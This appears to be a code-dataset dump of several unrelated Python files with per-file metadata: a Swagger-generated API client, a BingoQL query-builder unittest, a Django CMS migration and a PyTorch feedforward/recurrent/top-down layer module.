def getconnection_by_id(self, connection_id, **kwargs): # noqa: E501
"""Find connection by ID # noqa: E501
connection details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.getconnection_by_id(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of connection that needs to be fetched (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.getconnection_by_id_with_http_info(connection_id, **kwargs) # noqa: E501
else:
(data) = self.getconnection_by_id_with_http_info(connection_id, **kwargs) # noqa: E501
return data
def getconnection_by_id_with_http_info(self, connection_id, **kwargs): # noqa: E501
"""Find connection by ID # noqa: E501
connection details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.getconnection_by_id_with_http_info(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of connection that needs to be fetched (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['connection_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method getconnection_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'connection_id' is set
if ('connection_id' not in params or
params['connection_id'] is None):
raise ValueError("Missing the required parameter `connection_id` when calling `getconnection_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'connection_id' in params:
path_params['connectionId'] = params['connection_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/connection/{connectionId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Connection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def place_connection(self, body, **kwargs): # noqa: E501
"""Place an connection request from the SDX-Controller # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_connection(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Connection body: order placed for creating a connection (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.place_connection_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.place_connection_with_http_info(body, **kwargs) # noqa: E501
return data
def place_connection_with_http_info(self, body, **kwargs): # noqa: E501
"""Place an connection request from the SDX-Controller # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_connection_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Connection body: order placed for creating a connection (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method place_connection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `place_connection`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/conection', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Connection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.911672
| 156
| 0.615161
| 1,382
| 12,018
| 5.107815
| 0.125904
| 0.046466
| 0.023799
| 0.030599
| 0.884686
| 0.872362
| 0.865278
| 0.846721
| 0.839921
| 0.836521
| 0
| 0.015625
| 0.297054
| 12,018
| 316
| 157
| 38.031646
| 0.819957
| 0.342153
| 0
| 0.751515
| 0
| 0
| 0.177967
| 0.037271
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042424
| false
| 0
| 0.024242
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a12b0572dc9ab7b2550550a3f10d1180c2c5eded
| 6,797
|
py
|
Python
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 204
|
2015-11-06T21:34:34.000Z
|
2022-03-30T16:17:01.000Z
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 509
|
2015-11-05T13:54:43.000Z
|
2022-03-30T22:15:30.000Z
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 89
|
2015-11-17T08:22:54.000Z
|
2022-03-17T04:26:28.000Z
|
import unittest
from query import QueryBuilder
class TestBingoQL(unittest.TestCase):
def setUp(self):
self.builder = QueryBuilder()
def testQueryByPropName(self):
query = self.builder.build_query('"monoisotopic_weight"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'monoisotopic_weight'}, self.builder.bind_params)
query = self.builder.build_query('"BBB log([brain]:[blood])"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'bbb log([brain]:[blood])'}, self.builder.bind_params)
query = self.builder.build_query('~"count"')
self.assertEquals(u"(elems->>'y' LIKE %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'%count%'}, self.builder.bind_params)
query = self.builder.build_query('count')
self.assertEquals(u"(elems->>'y' LIKE %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'%count%'}, self.builder.bind_params)
def testQueryPropWithValue(self):
query = self.builder.build_query('"atom_count" != 30')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float != %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'atom_count', 'property_value_0': '30'}, self.builder.bind_params)
query = self.builder.build_query('"weight" > 0.537')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'weight', 'property_value_0': '0.537'}, self.builder.bind_params)
query = self.builder.build_query('count > 25')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%count%', 'property_value_0': '25'}, self.builder.bind_params)
query = self.builder.build_query('"formula" = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query("'formula' != " + '"C14H21N3O2"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' != %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query('~"molecular formula" = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%molecular formula%', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query('formula = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%formula%', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query("'formula' ~ 'C14H21N3O2'")
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': '%c14h21n3o2%'}, self.builder.bind_params)
query = self.builder.build_query("formula !~ C14H21N3O2")
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' NOT LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%formula%', 'property_value_0': '%c14h21n3o2%'}, self.builder.bind_params)
query = self.builder.build_query('"P-gp category_Probability" ~ "no"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'p-gp category_probability', 'property_value_0': '%no%'}, self.builder.bind_params)
query = self.builder.build_query('"PPB90 category_Probability" ~ "high = 0.18;"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'ppb90 category_probability', 'property_value_0': u'%high = 0.18;%'}, self.builder.bind_params)
query = self.builder.build_query('"molecular_formula" !~ "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' NOT LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'molecular_formula', 'property_value_0': u'%c14h21n3o2%'}, self.builder.bind_params)
def testQueryCompound(self):
query = self.builder.build_query('"mass" > 30 OR ~"probability" !~ "LOW"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s) OR (elems->>'x' LIKE %(property_term_1)s AND elems->>'y' NOT LIKE %(property_value_1)s)", query)
self.assertEquals({
'property_term_0': u'mass',
'property_value_0': u'30',
'property_term_1': u'%probability%',
'property_value_1': u'%low%',
}, self.builder.bind_params)
query = self.builder.build_query('"STATUS" or ~"NAME" or "CODE"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s) OR (elems->>'y' LIKE %(property_term_1)s) OR (elems->>'y' = %(property_term_2)s)", query)
self.assertEquals({
'property_term_0': u'status',
'property_term_1': u'%name%',
'property_term_2': u'code',
}, self.builder.bind_params)
query = self.builder.build_query('logP > 2 and StdDev < 0.5')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s))\n inner join {1} t1 on str.s = t1.s\n inner join jsonb_array_elements(t1.p) elems_t1 on ((elems_t1->>'x' LIKE %(property_term_1)s AND jsonb_typeof(elems_t1->'y') = 'number' AND (elems_t1->>'y')::float < %(property_value_1)s)", query)
self.assertEquals({
'property_term_0': u'%logp%',
'property_term_1': u'%stddev%',
'property_value_0': u'2',
'property_value_1': u'0.5',
}, self.builder.bind_params)
if __name__ == '__main__':
unittest.main()
| 65.355769
| 427
| 0.648521
| 913
| 6,797
| 4.582694
| 0.085433
| 0.131931
| 0.118069
| 0.095363
| 0.821224
| 0.778203
| 0.756692
| 0.747132
| 0.734465
| 0.669455
| 0
| 0.03637
| 0.166691
| 6,797
| 103
| 428
| 65.990291
| 0.702331
| 0
| 0
| 0.234568
| 0
| 0.185185
| 0.496101
| 0.09107
| 0
| 0
| 0
| 0
| 0.469136
| 1
| 0.049383
| false
| 0
| 0.024691
| 0
| 0.08642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a172e9b6fb45ef5766e0125c2aac0f55dcaa4846
| 9,978
|
py
|
Python
|
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2.8 on 2021-11-15 05:11
import ckeditor.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalogue', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='WebsiteCompanyLogo',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('logo_title', models.CharField(max_length=30, verbose_name='Home Name')),
('logo_image', models.ImageField(upload_to='company/logo_images', verbose_name='Logo Image (small)')),
('logo_image_large', models.ImageField(upload_to='company/logo_images_large', verbose_name='Logo Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_websitecompanylogos', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_websitecompanylogos', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ProductBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Banner Name')),
('banner_image', models.ImageField(upload_to='product/banner_images', verbose_name='Banner Image (small)')),
('banner_image_large', models.ImageField(upload_to='product/banner_images_large', verbose_name='Banner Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_productbanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_productbanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='HomePageBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Home Name')),
('banner_image', models.ImageField(upload_to='product/banner_images', verbose_name='Home Image (small)')),
('banner_image_large', models.ImageField(upload_to='product/banner_images_large', verbose_name='Home Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_homepagebanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_homepagebanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='DealOfTheDayProduct',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('title', models.CharField(max_length=30, verbose_name='Home Name')),
('image', models.ImageField(blank=True, null=True, upload_to='company/images', verbose_name='Logo Image')),
('short_description', models.TextField()),
('content', ckeditor.fields.RichTextField(blank=True, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_dealofthedayproducts', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('product', models.ForeignKey(blank=True, limit_choices_to={'is_active': '1'}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='deal_product', to='catalogue.product', verbose_name='Deal Products')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_dealofthedayproducts', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CompanyBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Banner Name')),
('banner_image', models.ImageField(upload_to='company/banner_images', verbose_name='Banner Image (small)')),
('banner_image_large', models.ImageField(upload_to='company/banner_images_large', verbose_name='Banner Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_companybanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_companybanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Company Banner',
'verbose_name_plural': 'Company Banner',
'db_table': 'company_banner',
},
),
]
| 80.467742
| 323
| 0.655642
| 1,157
| 9,978
| 5.401037
| 0.095938
| 0.082733
| 0.032645
| 0.045607
| 0.881101
| 0.87374
| 0.87294
| 0.855977
| 0.829733
| 0.822852
| 0
| 0.00999
| 0.197434
| 9,978
| 123
| 324
| 81.121951
| 0.770355
| 0.00451
| 0
| 0.568966
| 1
| 0
| 0.213775
| 0.041587
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1c2fd1c5388c84a00896d9e5e762075c580cf03
| 9,868
|
py
|
Python
|
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class TripleLayerConv(nn.Module):
def __init__(self, input_channels, output_channels, topdown_channels, feedforward_recurrent_parameters,
topdown_parameters, dropout=None):
"""This is a unit that contains triple convolutional/conv_transpose layers to implement feedforward, recurrent,
and top-down processing of images"""
super(TripleLayerConv, self).__init__()
# save some parameters for later
self.input_channels = input_channels
self.output_channels = output_channels
self.feedforward_parameters = feedforward_recurrent_parameters
self.dropout = dropout
# Model parameters based on inputs
activation_function = {
'relu': nn.ReLU(),
'elu': nn.ELU(),
'leaky_relu': nn.LeakyReLU(),
'tanh': nn.Tanh()
}
self.feedforward_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.recurrent_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.topdown_activation = activation_function[topdown_parameters['activation']]
self.feedforward_layer = nn.Conv2d(input_channels, output_channels,
kernel_size=feedforward_recurrent_parameters['kernel_size'],
stride=feedforward_recurrent_parameters['stride'],
padding=feedforward_recurrent_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
self.recurrent_layer = nn.ConvTranspose2d(output_channels, input_channels,
kernel_size=feedforward_recurrent_parameters['kernel_size'],
stride=feedforward_recurrent_parameters['stride'],
padding=feedforward_recurrent_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
self.topdown_layer = nn.ConvTranspose2d(topdown_channels, input_channels,
kernel_size=topdown_parameters['kernel_size'],
stride=topdown_parameters['stride'],
padding=topdown_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
def forward(self, input_data, feedforward_flag=True, recurrent_flag=True, topdown_flag=True, data_size=None):
"""This supports any of the combinations between feedforward, recurrent, top_down by turning on an off
any of the flags for that pathway. It can even go in a backward direction if the feedforward flag is turned
off and data_size is given. Input data should be a list of three inputs in full mode where feedforward input
is the first element, recurrent is second and top-down is third. In case of absence of feedforward with any of
the later inputs presence, any placeholder should be inserted in its place. Same goes for absence of recurrent
input and presence of top-down."""
# print('feedforward = {}'.format(feedforward_flag))
# print('recurrent = {}'.format(recurrent_flag))
# print('topdown = {}'.format(topdown_flag))
if feedforward_flag:
x_feedforward = input_data[0]
else:
x_feedforward = torch.zeros(data_size)
if (recurrent_flag and input_data[1].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_feedforward = x_feedforward.cuda()
if recurrent_flag:
x_recurrent = input_data[1]
x_recurrent = self.recurrent_activation(self.recurrent_layer(x_recurrent))
else:
x_recurrent = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_recurrent = x_recurrent.cuda()
if topdown_flag:
x_topdown = input_data[2]
if len(x_topdown.shape) < 3:
x_topdown = x_topdown.contiguous().view(-1, x_topdown.shape[-1], 1, 1)
x_topdown = self.topdown_activation(self.topdown_layer(x_topdown))
else:
x_topdown = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (recurrent_flag and input_data[1].is_cuda):
x_topdown = x_topdown.cuda()
# print('feedforward cuda = {}'.format(x_feedforward.is_cuda))
# print('recurrent cuda = {}'.format(x_recurrent.is_cuda))
# print('topdown cuda = {}'.format(x_topdown.is_cuda))
x = x_feedforward + x_recurrent + x_topdown
output = self.feedforward_activation(self.feedforward_layer(x))
if self.dropout is not None:
output = nn.Dropout(0.5)(output)
return output, x_recurrent, x_topdown
def output_size(self, input_size):
"""Assuming square kernels"""
assert input_size[0] == self.input_channels
width_height = ((input_size[1] +
2 * self.feedforward_parameters['padding']
- self.feedforward_parameters['kernel_size'])
/ self.feedforward_parameters['stride']) + 1
width_height = int(width_height)
return [self.output_channels, width_height, width_height]
@staticmethod
def __name__():
return 'TripleLayerConv'
class TripleLayerFc(nn.Module):
def __init__(self, input_channels, output_channels, topdown_channels, feedforward_recurrent_parameters,
topdown_parameters, dropout=None):
"""This is a unit that contains triple fully-connected layers to implement feedforward, recurrent,
and top-down processing of 1-D data"""
super(TripleLayerFc, self).__init__()
# save some parameters for later
self.input_channels = input_channels
self.output_channels = output_channels
self.dropout = dropout
# Model parameters based on inputs
activation_function = {
'relu': nn.ReLU(),
'elu': nn.ELU(),
'leaky_relu': nn.LeakyReLU(),
'tanh': nn.Tanh(),
'softmax': nn.Softmax(dim=1),
'none': nn.Identity()
}
self.feedforward_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.recurrent_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.topdown_activation = activation_function[topdown_parameters['activation']]
self.feedforward_layer = nn.Linear(input_channels, output_channels)
self.recurrent_layer = nn.Linear(output_channels, input_channels)
self.topdown_layer = nn.Linear(topdown_channels, input_channels)
def forward(self, input_data, feedforward_flag=True, recurrent_flag=True, topdown_flag=True, data_size=None):
"""This supports any of the combinations between feedforward, recurrent, top_down by turning on an off
any of the flags for that pathway. It can even go in a backward direction if the feedforward flag is turned
off and data_size is given. Input data should be a list of three inputs in full mode where feedforward input
is the first element, recurrent is second and top-down is third. In case of absence of feedforward with any of
the later inputs presence, any placeholder should be inserted in its place. Same goes for absence of recurrent
input and presence of top-down."""
# print('feedforward = {}'.format(feedforward_flag))
# print('recurrent = {}'.format(recurrent_flag))
# print('topdown = {}'.format(topdown_flag))
if feedforward_flag:
x_feedforward = input_data[0]
else:
x_feedforward = torch.zeros(data_size)
if (recurrent_flag and input_data[1].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_feedforward = x_feedforward.cuda()
if len(x_feedforward.shape) > 2:
x_feedforward = x_feedforward.contiguous().view(-1, self.input_channels)
if recurrent_flag:
x_recurrent = input_data[1]
x_recurrent = self.recurrent_activation(self.recurrent_layer(x_recurrent))
else:
x_recurrent = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_recurrent = x_recurrent.cuda()
if topdown_flag:
x_topdown = input_data[2]
x_topdown = self.topdown_activation(self.topdown_layer(x_topdown))
else:
x_topdown = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (recurrent_flag and input_data[1].is_cuda):
x_topdown = x_topdown.cuda()
# print('feedforward cuda = {}'.format(x_feedforward.is_cuda))
# print('recurrent cuda = {}'.format(x_recurrent.is_cuda))
# print('topdown cuda = {}'.format(x_topdown.is_cuda))
x = x_feedforward + x_recurrent + x_topdown
output = self.feedforward_activation(self.feedforward_layer(x))
if self.dropout is not None:
output = nn.Dropout(0.5)(output)
return output, x_recurrent, x_topdown
def output_size(self, input_size):
"""Assuming square kernels"""
assert input_size[0] == self.input_channels
return [self.output_channels]
@staticmethod
def __name__():
return 'TripleLayerFc'
| 50.605128
| 119
| 0.639137
| 1,139
| 9,868
| 5.287972
| 0.127305
| 0.032874
| 0.064752
| 0.031878
| 0.836626
| 0.829321
| 0.829321
| 0.829321
| 0.829321
| 0.829321
| 0
| 0.006286
| 0.274524
| 9,868
| 194
| 120
| 50.865979
| 0.835033
| 0.224666
| 0
| 0.726563
| 0
| 0
| 0.033569
| 0
| 0
| 0
| 0
| 0
| 0.015625
| 1
| 0.0625
| false
| 0
| 0.015625
| 0.015625
| 0.140625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62e39f68632f51c49d1f8271a8b1e400236bb589
| 6,811
|
py
|
Python
|
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
] | null | null | null |
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
